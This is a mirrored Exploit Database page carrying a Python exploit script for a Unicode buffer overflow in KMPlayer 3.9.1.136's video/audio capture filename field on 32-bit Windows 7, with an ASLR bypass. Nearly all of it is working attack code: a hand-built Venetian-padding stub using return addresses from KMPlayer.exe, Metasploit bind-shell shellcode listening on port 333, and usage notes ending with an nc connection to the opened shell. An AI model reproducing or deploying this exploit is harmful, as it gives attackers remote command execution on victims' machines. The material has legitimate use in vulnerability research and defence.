KMPlayer 3.9.1.136 – Capture Unicode Buffer Overflow (ASLR Bypass)

• Exploit Database
• 106 阅读

• 作者： Naser Farhadi
  日期： 2015-06-23
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/37344/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104

  #!/usr/bin/python # # KMPlayer 3.9.1.136 Capture Unicode Buffer Overflow (ASLR Bypass) # # Author: Naser Farhadi # # Date: 21 June 2015 # Version: 3.9.1.136 # Tested on: Windows 7 SP1 (32 bit) # # Usage: # chmod +x KMPlayer.py # python KMPlayer.py # Alt+c | Video Capture | Alt+a | Audio Capture # paste content of KMPlayer.txt into Filename # nc 172.20.10.14 333 # # Video: http://youtu.be/9gtZxR2ioTM ##   buffer = ( "\x50"# PUSH EAX "\x40"# Venetian Padding => ADD BYTE PTR DS:[EAX],AL "\x5c"# POP ESP "\x40"# Venetian Padding => ADD BYTE PTR DS:[EAX],AL "\x61"# POPAD "\x45"# Venetian Padding => ADD BYTE PTR SS:[EBP],AL ""+("\x5f\x45" * 125)+""# (POP EDI/Venetian Padding => ADD BYTE PTR SS:[EBP],AL)*125 "\x54"# PUSH ESP "\x45"# Venetian Padding => ADD BYTE PTR SS:[EBP],AL "\x45"# Padding => INC EBP "\x45"# Venetian Padding => ADD BYTE PTR SS:[EBP],AL "\x61"# POPAD "\x47"# Venetian Padding => ADD BYTE PTR DS:[EDI],AL "\x33\x77"# POP EBP/RETN from KMPlayer.exe "\x58"# POP EAX "\x47"# Venetian Padding => ADD BYTE PTR DS:[EDI],AL "\x33\x77"# POP EBP/RETN from KMPlayer.exe "\x58"# POP EAX "\x47"# Venetian Padding => ADD BYTE PTR DS:[EDI],AL "\x33\x77"# POP EBP/RETN from KMPlayer.exe "\x5d"# POP EBP "\x47"# Venetian Padding => ADD BYTE PTR DS:[EDI],AL "\x71"# Padding => JNO SHORT 0x2 "\x71"# Venetian Padding => ADD BYTE PTR DS:[ECX],DH )   # msfpayload windows/shell_bind_tcp LPORT=333 R|msfencode -e x86/unicode_mixed BufferRegister=ESP -t c shellcode = ("\x54\x47\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" "\x49\x41\x6a\x58\x41\x51\x41\x44\x41\x5a\x41\x42\x41\x52\x41" "\x4c\x41\x59\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68" "\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49" "\x41\x49\x41\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49" "\x41\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41\x5a" "\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39" "\x75\x34\x4a\x42\x69\x6c\x39\x58\x31\x72\x79\x70\x4d\x30\x39" "\x70\x53\x30\x75\x39\x67\x75\x4e\x51\x35\x70\x62\x44\x52\x6b" "\x70\x50\x6e\x50\x52\x6b\x52\x32\x4c\x4c\x54\x4b\x72\x32\x4b" "\x64\x42\x6b\x52\x52\x4d\x58\x5a\x6f\x38\x37\x6f\x5a\x6c\x66" "\x4c\x71\x59\x6f\x36\x4c\x4d\x6c\x30\x61\x51\x6c\x4a\x62\x6c" "\x6c\x6f\x30\x69\x31\x78\x4f\x4a\x6d\x59\x71\x77\x57\x67\x72" "\x4b\x42\x70\x52\x6e\x77\x62\x6b\x6e\x72\x6a\x70\x32\x6b\x6e" "\x6a\x6d\x6c\x74\x4b\x30\x4c\x5a\x71\x32\x58\x49\x53\x70\x48" "\x6d\x31\x57\x61\x4e\x71\x44\x4b\x61\x49\x6d\x50\x6a\x61\x4a" "\x33\x72\x6b\x71\x39\x6e\x38\x58\x63\x6d\x6a\x70\x49\x62\x6b" "\x6c\x74\x74\x4b\x4d\x31\x58\x56\x4d\x61\x69\x6f\x54\x6c\x76" "\x61\x78\x4f\x7a\x6d\x69\x71\x47\x57\x4f\x48\x57\x70\x43\x45" "\x58\x76\x5a\x63\x61\x6d\x59\x68\x6f\x4b\x61\x6d\x6c\x64\x33" "\x45\x57\x74\x30\x58\x54\x4b\x30\x58\x6d\x54\x69\x71\x37\x63" "\x70\x66\x44\x4b\x4c\x4c\x70\x4b\x34\x4b\x6f\x68\x4d\x4c\x59" "\x71\x68\x53\x64\x4b\x6c\x44\x44\x4b\x5a\x61\x78\x50\x73\x59" "\x51\x34\x6c\x64\x6e\x44\x61\x4b\x4f\x6b\x43\x31\x4f\x69\x31" "\x4a\x70\x51\x49\x6f\x49\x50\x71\x4f\x61\x4f\x70\x5a\x72\x6b" "\x6c\x52\x48\x6b\x64\x4d\x51\x4d\x72\x48\x6c\x73\x70\x32\x49" "\x70\x49\x70\x33\x38\x43\x47\x52\x53\x4d\x62\x71\x4f\x4e\x74" "\x70\x68\x50\x4c\x44\x37\x6c\x66\x6c\x47\x39\x6f\x47\x65\x37" "\x48\x42\x70\x6a\x61\x4d\x30\x39\x70\x4d\x59\x37\x54\x42\x34" "\x30\x50\x33\x38\x4b\x79\x35\x30\x42\x4b\x59\x70\x4b\x4f\x46" "\x75\x31\x5a\x39\x78\x30\x59\x30\x50\x37\x72\x39\x6d\x31\x30" "\x42\x30\x4d\x70\x72\x30\x61\x58\x38\x6a\x4c\x4f\x57\x6f\x77" "\x70\x79\x6f\x66\x75\x56\x37\x53\x38\x6b\x52\x39\x70\x79\x71" "\x4e\x6d\x61\x79\x67\x76\x62\x4a\x4a\x70\x52\x36\x6e\x77\x51" "\x58\x57\x52\x59\x4b\x70\x37\x62\x47\x49\x6f\x38\x55\x72\x37" "\x42\x48\x74\x77\x69\x59\x4f\x48\x69\x6f\x69\x6f\x76\x75\x6f" "\x67\x63\x38\x52\x54\x5a\x4c\x4f\x4b\x68\x61\x79\x6f\x68\x55" "\x31\x47\x46\x37\x62\x48\x54\x35\x72\x4e\x6e\x6d\x50\x61\x69" "\x6f\x77\x65\x63\x38\x62\x43\x62\x4d\x42\x44\x6d\x30\x75\x39" "\x58\x63\x32\x37\x6e\x77\x50\x57\x50\x31\x6a\x56\x71\x5a\x6e" "\x32\x32\x39\x51\x46\x59\x52\x49\x6d\x52\x46\x38\x47\x70\x44" "\x4f\x34\x4f\x4c\x4d\x31\x6b\x51\x74\x4d\x6e\x64\x6f\x34\x6c" "\x50\x76\x66\x6b\x50\x6e\x64\x51\x44\x32\x30\x50\x56\x71\x46" "\x6e\x76\x4f\x56\x70\x56\x50\x4e\x62\x36\x6f\x66\x70\x53\x71" "\x46\x51\x58\x54\x39\x46\x6c\x6d\x6f\x31\x76\x4b\x4f\x79\x45" "\x34\x49\x59\x50\x50\x4e\x6f\x66\x50\x46\x4b\x4f\x30\x30\x63" "\x38\x6c\x48\x54\x47\x6d\x4d\x33\x30\x39\x6f\x66\x75\x75\x6b" "\x68\x70\x37\x45\x44\x62\x30\x56\x53\x38\x54\x66\x74\x55\x65" "\x6d\x53\x6d\x4b\x4f\x79\x45\x6d\x6c\x59\x76\x43\x4c\x6a\x6a" "\x35\x30\x4b\x4b\x59\x50\x70\x75\x6b\x55\x55\x6b\x30\x47\x7a" "\x73\x33\x42\x50\x6f\x30\x6a\x59\x70\x32\x33\x6b\x4f\x79\x45" "\x41\x41")   buffer += shellcode + "\x71" * (1534 - len(shellcode))   open("KMPlayer.txt", "wb").write(buffer)